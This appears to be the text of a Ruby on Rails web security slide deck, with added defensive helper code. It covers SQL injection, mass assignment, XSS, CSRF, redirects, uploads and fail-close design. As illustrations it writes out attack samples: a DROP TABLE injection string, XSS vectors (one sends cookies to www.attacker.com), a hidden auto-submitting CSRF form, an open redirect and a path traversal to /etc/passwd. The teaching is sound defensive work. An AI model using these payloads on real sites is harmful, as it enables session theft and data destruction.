2. About Me
• a.k.a. ihower
• http://ihower.tw
• http://twitter.com/ihower
• http://github.com/ihower
• Ruby on Rails Developer since 2006
• Ruby Taiwan Community
• http://ruby.tw
3. Defense in Depth
• Network: firewalls, IDS
• Operating system
• Web server
• Web application
• Database
4. 75% of attacks are at the web application layer
(Gartner Group estimate)
5. What is Security?
• a measurement, not a characteristic
• not a simple requirement to be met...
• must be balanced with expense
• it's easy and relatively inexpensive to provide a sufficient level of security for most applications. But if you need more...
• must be balanced with usability
• increasing security often also decreases usability...
• must be part of the design
(from PHP Security Guide: Overview)
6. Okay, your users are evil: they will send you illegitimate operations and data.
10. Web and Application Server?
• Server Header
• apache
• nginx
• mongrel
• mod_rails
11. Disable Server Header
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.5 with Suhosin-Patch Phusion_Passenger/2.2.9
✓ # apache2.conf
ServerSignature Off
ServerTokens Prod
Server: Apache
12. SVN metadata
• GET http://your_site.org/.svn/entries
✓ <DirectoryMatch "^/.*/.svn/">
    ErrorDocument 403 /404.html
    Order allow,deny
    Deny from all
    Satisfy All
  </DirectoryMatch>
Or just delete it:
http://plog.longwin.com.tw/my_note-unix/2008/01/07/find_delete_svn_directory_2008
13. Sensitive Information
• Do not store sensitive information in the clear in:
• cookie
• session (or flash)
• memory for a long time
• log files
• cache
15. Cookie Session Storage
# config/initializers/session_store.rb
ActionController::Base.session = {
  :key    => '_app_session',
  :secret => '0x0dkfj3927dkc7djdh36rkckdfzsg...'
}
• Don’t use a trivial secret
• Don’t store any secret information here
• Or.... just switch to another session storage
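Why both bullets matter, as an added illustration (not code from the slides or from Rails): the functions below model the Rails 2 CookieStore layout, a Marshal dump in Base64 followed by an HMAC-SHA1 over it, which is signed but not encrypted; the layout, the names and the 30-character minimum are stated here as assumptions.

```ruby
require 'base64'
require 'openssl'

# Constructed model of the Rails 2 CookieStore layout (an assumption here,
# not Rails' own code): "<base64 Marshal dump>--<hex HMAC-SHA1 of that base64>".
def sign_data(data, secret)
  OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('sha1'), secret, data)
end

def encode_session(session, secret)
  data = Base64.strict_encode64(Marshal.dump(session))
  "#{data}--#{sign_data(data, secret)}"
end

# The attacker's view: the payload is signed, not encrypted, so anyone holding
# the cookie can read it without the secret. Never put secrets in here.
def peek_session(cookie)
  data, _sig = cookie.split('--', 2)
  Marshal.load(Base64.decode64(data))
end

# The application's view: check the HMAC (constant-time) before trusting,
# or even deserializing, the payload; a forged or re-signed cookie yields nil.
def verify_session(cookie, secret)
  data, sig = cookie.split('--', 2)
  return nil if sig.nil? || sig.bytesize != 40
  expected = sign_data(data, secret)
  diff = 0
  expected.bytes.zip(sig.bytes) { |a, b| diff |= a ^ b }
  diff.zero? ? Marshal.load(Base64.decode64(data)) : nil
end

# Rails 2 itself rejects secrets shorter than 30 characters; same rule here.
def trivial_secret?(secret)
  secret.nil? || secret.length < 30
end

if __FILE__ == $0
  secret = 'a-long-random-secret-0123456789abcdef0123456789'
  cookie = encode_session({ :user_id => 7, :cart => ['book'] }, secret)
  p peek_session(cookie)                  # readable with no secret at all
  p verify_session(cookie, secret)        # genuine cookie: accepted
  p verify_session(cookie, 'wrong' * 8)   # wrong secret: nil
end
```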
16. Session
The session id is a 32 byte long MD5 hash value.
• Hijacking
• Fixation
• reset_session after every login
17. SQL injection
params[:name] = "x'; DROP TABLE users; --"
Project.find(:all, :conditions => "name = '#{params[:name]}'")
SELECT * FROM projects WHERE name = 'x'; DROP TABLE users; --'
18. SQL injection
Vulnerable methods and options:
• find_by_sql
• execute
• find with conditions in a string
• limit and offset (before Rails 2.1.1)
• group_by
• order
19. Always use the hash or array form
✓
Project.find(:all, :conditions => { :name => params[:name] } )
# or
Project.find(:all, :conditions => ["name = ?", params[:name] ] )
20. Only allow predefined values
class User < ActiveRecord::Base
✓ def self.find_with_order(order)
    # whitelist: anything outside the known ORDER BY clauses is rejected
    raise "SQL Injection Warning" unless ["id", "id desc"].include?(order)
    find(:all, :limit => 1, :order => order)
  end
end
21. Use quote if you need to pass it directly
ActiveRecord::Base.connection.quote
class User < ActiveRecord::Base
✓ def self.find_with_order(order)
    # quote escapes the argument as a SQL string literal; the whitelist on the
    # previous slide remains the safer choice for ORDER BY clauses
    find(:all, :order => connection.quote(order))
  end
end
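The mechanics behind slides 17 to 20, as an added example that is not the slides' or ActiveRecord's own code: bind_conditions stands in for the array form (placeholder plus quoting), and safe_order is the whitelist approach generalised to a lookup table; ALLOWED_ORDERS and the function names are assumptions.

```ruby
# Stand-ins for ActiveRecord's quoting (constructed here, not AR's code).
def quote_value(value)
  case value
  when Integer then value.to_s
  when nil     then 'NULL'
  else "'" + value.to_s.gsub("'", "''") + "'"   # standard SQL: double each quote
  end
end

# ["name = ?", params[:name]] -> "name = 'x''; DROP TABLE users; --'"
# Only the template is scanned for "?"; substituted values are never re-parsed.
def bind_conditions(template, *values)
  raise ArgumentError, 'placeholder count mismatch' unless template.count('?') == values.size
  vals = values.dup
  template.gsub('?') { quote_value(vals.shift) }
end

# An ORDER BY clause is an identifier, not a value, so it cannot be quoted
# into safety: map the user's choice onto a fixed table (slide 20's idea),
# falling back to the default for anything unknown.
ALLOWED_ORDERS = { 'id' => 'id', 'id desc' => 'id DESC', 'name' => 'name' }.freeze

def safe_order(requested, default = 'id')
  ALLOWED_ORDERS.fetch(requested.to_s.strip.downcase) { ALLOWED_ORDERS.fetch(default) }
end

def projects_query(name, order)
  "SELECT * FROM projects WHERE #{bind_conditions('name = ?', name)} ORDER BY #{safe_order(order)}"
end

if __FILE__ == $0
  puts projects_query("x'; DROP TABLE users; --", 'id; DROP TABLE users')
  # => SELECT * FROM projects WHERE name = 'x''; DROP TABLE users; --' ORDER BY id
end
```

MySQL additionally treats backslash as an escape character; the real adapter handles that, this stand-in only shows the principle.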
22. Mass assignment
def create
  params[:user] #=> {:name => "ow3ned", :is_admin => true}
  @user = User.create(params[:user])
end
def update
  @user = User.find(params[:id])
  @user.update_attributes(params[:user])
end
23. Protect it!
✓ class User < ActiveRecord::Base
    attr_protected :is_admin
  end
# or
  class User < ActiveRecord::Base
    attr_accessible :name
  end
25. Unscoped finds
class UserOrdersController < ApplicationController
  # any user can fetch any order just by guessing its id
  def show
    @order = Order.find(params[:id])
  end
end
✓
class UserOrdersController < ApplicationController
  # scoped: only the current user's own orders can be found
  def show
    @order = current_user.orders.find(params[:id])
  end
end
26. Controller Exposing methods
• Use protected and private
• If you use RESTful design, do not use the default routes
• http://ihower.tw/blog/archives/3265
27. XSS (Cross-Site Scripting)
Malicious users inject client-side script into web pages viewed by other users.
<script>alert('HACK YOU!');</script>
<img src=javascript:alert('HACK YOU!')>
<table background="javascript:alert('HACK YOU!')">
<script>document.write(document.cookie);</script>
<script>document.write('<img src="http://www.attacker.com/' + document.cookie + '">');</script>
• Don't try to build a blacklist; you can find many more vectors at http://ha.ckers.org/xss.html
28. XSS Protection (Rails2)
• Use escapeHTML() (or its alias h()) method
• Plugins
• http://github.com/nzkoz/rails_xss (for Rails 2.3)
• http://agilewebdevelopment.com/plugins/safe_erb
• http://code.google.com/p/xss-shield/ (Tainting way)
29. XSS Protection (Rails3)
• Rails 3 auto-escapes strings
• Unless you html_safe or raw the string
• "<p>safe</p>".html_safe
• raw("<p>safe</p>")
30. Allow users to use simple HTML code
• Use the white-list sanitize() method
• If you use the Textile or Markdown markup language, you still need to sanitize the result.
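How escaping and white-list sanitizing differ, as an added example that is not the slides' or Rails' own code: h() escapes everything, and sanitize_simple escapes everything and then re-enables only exact, attribute-free tags from a fixed list, so the vectors from slide 27 stay inert; ALLOWED_TAGS and the function names are assumptions, and the same call should be run over Textile or Markdown output.

```ruby
require 'cgi'

# Plain escaping: every <, >, &, " and ' becomes an entity (what h() does).
def h(text)
  CGI.escapeHTML(text.to_s)
end

# Tags allowed back in: formatting only, never anything that carries a URL
# or an event handler.
ALLOWED_TAGS = %w[b i em strong p br].freeze

# White-list sanitizer (constructed here, not Rails' sanitize): escape the whole
# string first, then re-open only bare "<tag>" / "</tag>" tokens from the list.
# Anything carrying attributes (src=, background=, onclick=, ...) never matches
# the token pattern and therefore stays escaped.
def sanitize_simple(text)
  h(text).gsub(%r{&lt;(/?)(\w+)&gt;}) do
    slash, tag = $1, $2.downcase
    ALLOWED_TAGS.include?(tag) ? "<#{slash}#{tag}>" : $&
  end
end

if __FILE__ == $0
  puts h("<script>alert('HACK YOU!');</script>")
  puts sanitize_simple("<b>bold</b> <img src=javascript:alert('HACK YOU!')>")
end
```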
31. CSRF
Cross-Site Request Forgery
Using another user's authorization token to interact with a web application as that trusted user, in a malicious way.
32. CSRF protection (1)
• Use GET requests for safe operations such as a query, read operation, or lookup
• Use POST requests for any destructive actions such as create, update, delete
33. But...
• POST requests can be sent automatically, too. An example:
<a href="http://www.harmless.com/" onclick="
  var f = document.createElement('form');
  f.style.display = 'none';
  this.parentNode.appendChild(f);
  f.method = 'POST';
  f.action = 'http://www.example.com/account/destroy';
  f.submit();
  return false;">To the harmless survey</a>
34. CSRF protection (2)
protect_from_forgery will check all POST requests for a security token
✓ class ApplicationController < ActionController::Base
    protect_from_forgery
  end
<form action="/projects/1" class="edit_project" enctype="multipart/form-data" id="edit_project_1" method="post">
  <div style="margin:0;padding:0;display:inline">
    <input name="_method" type="hidden" value="put" />
    <input name="authenticity_token" type="hidden" value="cuI+ljBAcBxcEkv4pbeqLTEnRUb9mUYMgfpkwOtoyiA=" />
  </div>
35. Redirection
Do not allow users to pass (parts of) the URL for redirection directly
def legacy
  redirect_to(params.update(:action => 'main'))
end
http://www.example.com/site/legacy?param1=xy&param2=23&host=www.attacker.com
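One way to validate a redirect target before handing it to redirect_to, as an added example that is not the slides' code: only a relative path or an http(s) URL on our own host is accepted, anything else (another host, a protocol-relative "//host", a non-http scheme) falls back to a fixed default; ALLOWED_HOST and the function name are assumptions.

```ruby
require 'uri'

# Assumed value for this example: the only host we redirect to.
ALLOWED_HOST = 'www.example.com'.freeze

# Returns the target if it is safe to redirect to, otherwise the default.
def safe_redirect_target(target, default = '/')
  return default if target.nil? || target.strip.empty?
  target = target.strip
  return default if target.include?('\\')   # "/\host" is read as "//host" by browsers
  uri = URI.parse(target)
  if uri.scheme.nil? && uri.host.nil?
    # plain relative path: must start with "/" (a bare "//host" parses with a host)
    return default unless target.start_with?('/')
  elsif uri.host.to_s.downcase == ALLOWED_HOST && %w[http https].include?(uri.scheme.to_s.downcase)
    # absolute URL on our own host over http(s): fine
  else
    # other hosts, "http:/host" (no authority), "javascript:", "mailto:", ...
    return default
  end
  target
rescue URI::InvalidURIError
  default
end

if __FILE__ == $0
  p safe_redirect_target('/site/main')              # "/site/main"
  p safe_redirect_target('http://www.attacker.com/') # "/"
end
```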
36. File Uploads: Overwrite
• Make sure file uploads don't overwrite important files, e.g. "../../../etc/passwd"
• Validate that the file name is simple. Don't try to remove malicious parts.
• Use plugins: attachment_fu or paperclip
37. File Uploads: Executable
• Never allow users to upload any extension associated with executable content on your site (.php, .cgi, etc.)
• When the user downloads, set the appropriate Content-Type HTTP header to eliminate the potential for XSS attacks.
• Or keep these files where your web server cannot serve them at all (outside the DocumentRoot in Apache)
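The two upload slides in code, as an added example that is not the slides' or any plugin's code: the name is validated rather than cleaned, every extension component is checked against executable types, and the file is stored outside the document root under a server-chosen name; UPLOAD_DIR, the extension list and the function names are assumptions.

```ruby
require 'securerandom'

# Assumed values for this example.
UPLOAD_DIR = '/var/app/uploads'.freeze              # not under Apache's DocumentRoot
SAFE_NAME  = /\A[A-Za-z0-9][A-Za-z0-9._-]{0,99}\z/  # no slashes, no leading dot
EXECUTABLE = %w[php php3 php4 php5 phtml cgi pl py rb sh exe].freeze

# Validate, don't repair: a name that is not plainly simple is rejected outright.
def valid_upload_name?(name)
  return false unless name.is_a?(String) && name =~ SAFE_NAME
  return false if name.include?('..')
  # Check every extension component, not just the last one: Apache's mod_mime
  # can treat "shell.php.txt" as PHP, so it must fail exactly like "shell.php".
  exts = name.downcase.split('.')[1..-1] || []
  (exts & EXECUTABLE).empty?
end

# Full path the file will be written to. The user-supplied name never becomes
# part of the path; only its validated extension is kept, so a name such as
# "../../../etc/passwd" cannot choose the destination.
def storage_path(user_name)
  raise ArgumentError, "rejected upload name: #{user_name.inspect}" unless valid_upload_name?(user_name)
  path = File.join(UPLOAD_DIR, SecureRandom.hex(16) + File.extname(user_name).downcase)
  raise ArgumentError, 'path escape' unless File.expand_path(path).start_with?(UPLOAD_DIR + '/')
  path
end

if __FILE__ == $0
  %w[report.pdf ../../../etc/passwd shell.php shell.php.txt .htaccess].each do |n|
    puts "#{n.ljust(22)} #{valid_upload_name?(n) ? 'accepted' : 'rejected'}"
  end
end
```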
39. Command Line Injection
system("/bin/echo", "hello; rm *")
# array form: the arguments never pass through a shell,
# so this prints "hello; rm *" and does not delete files
40. Denial-of-service attacks (DoS)
• Avoid long-running actions; use background processing.
• Don't bother your application server
• Let the web server serve static files
• Use an HTTP reverse proxy if needed
41. Host
• Platform (Windows, Linux, Solaris, BSDs): choose one you can trust and are familiar with
• Firewall: you can use the nmap tool to show which ports are open
• SSH: move port 22 to another port
• Turn off any services that you aren't using.
• Hire a system administrator to help: your time as a developer should be spent on the things you are good at.
43. Fail Close
# fail open way, it's bad
def show
  @invoice = Invoice.find(params[:id])
  unless @user.validate_code(@invoice.code)
    redirect_to :action => 'not_authorized'
  end
end
# fail close way
✓
def show
  @invoice = Invoice.find(params[:id])
  if @user.validate_code(@invoice.code)
    redirect_to :action => 'authorized'
  else
    redirect_to :action => 'not_authorized'
  end
end
44. Whitelisting
Use a whitelist; a blacklist is hardly ever complete
admins = %w{ihower ihover}
# fail close way
✓
if admins.include? user
  redirect_to :action => 'authorized'
else
  redirect_to :action => 'not_authorized'
end
# fail open way, don't do this
if !admins.include? user
  redirect_to :action => 'not_authorized'
else
  redirect_to :action => 'authorized'
end
45. Conclusion
• Rails has many security features enabled by
default
• SQL quoting
• HTML sanitization
• CSRF protection
46. Reference
• Agile Web Development with Rails, 3rd ed., Chap. 27 Securing Your Rails Application (Pragmatic)
• Rails 2, Chap. 13 Security and Performance Enhancements (friendsof)
• Advanced Rails, Chap. 5 Security (O'Reilly)
• Security Audit by Aaron Bedra (Peepcode)
• Security on Rails (Pragmatic)
• PHP Security Guide
• http://blog.innerewut.de/2009/11/3/ruby-en-rails-2009-recap
• http://guides.rubyonrails.org/security.html
• http://www.rorsecurity.info
• http://asciicasts.com/episodes/178-seven-security-tips
• http://www.ultrasaurus.com/sarahblog/2010/01/rails-security-review-checklist/
• http://www.quarkruby.com/2007/9/20/ruby-on-rails-security-guide
• http://www.owasp.org